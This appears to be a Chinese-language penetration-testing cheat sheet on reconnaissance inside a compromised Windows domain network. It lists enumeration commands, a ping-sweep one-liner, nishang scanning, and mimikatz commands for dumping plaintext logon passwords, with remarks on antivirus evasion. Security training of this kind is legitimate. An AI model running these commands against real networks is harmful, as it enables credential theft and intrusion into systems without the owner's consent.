内网渗透-信息收集

tasklist  查看进程列表

scktasks   查看计划任务

网络信息收集

ipconfig /all  判断是否存在域

net view /domain    判断是否存在域

net time /domain    判断主域

netstat -ano    当前网络端口开放情况

nslookup      追踪域IP地址

whoami  /all    用户权限

net localgroup    本地用户组

net user    本地用户

net user /domain    获取域用户信息

net group /domain    获取域用户组信息

net group "Domain Admins" /domain    查询域管理员账户

net group "Enterprise Admins" /domain    查询域管理员用户组

net group "Domain Controllers" /domain    查询域控制器

Windows明文账户密码获取工具 mimikatz

https://github.com/gentilkiwi/mimikatz

简单命令使用:

privilege::debug

sekurlsa::logonpasswords

计算机各种应用协议口令获取工具

lazagen

探针域控制器名及地址信息

net time /domain

nslookup ping

探针域内存活主机及地址信息

nbtscan 192.168.3.0/24 第三方工具        //可能需要免杀  可以看到哪个是DC 和其他信息

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL=" 自带内部命令 不需要免杀 只能看到存活主机


nmap masscan 第三方 PowerShell 脚本 nishang empire 等

#导入模块 nishang

Import-Module .\nishang.psm1

#设置执行策略

Set-ExecutionPolicy RemoteSigned

#获取模块 nishang 的命令函数

Get-Command -Module nishang

#获取常规计算机信息

Get-Information

#端口扫描(查看目录对应文件有演示语法,其他同理)

Invoke-PortScan -StartAddress 192.168.3.0 -EndAddress 192.168.3.100 -ResolveHost -ScanPort

#其他功能:删除补丁,反弹 Shell,凭据获取等

你可能感兴趣的:(内网渗透-信息收集)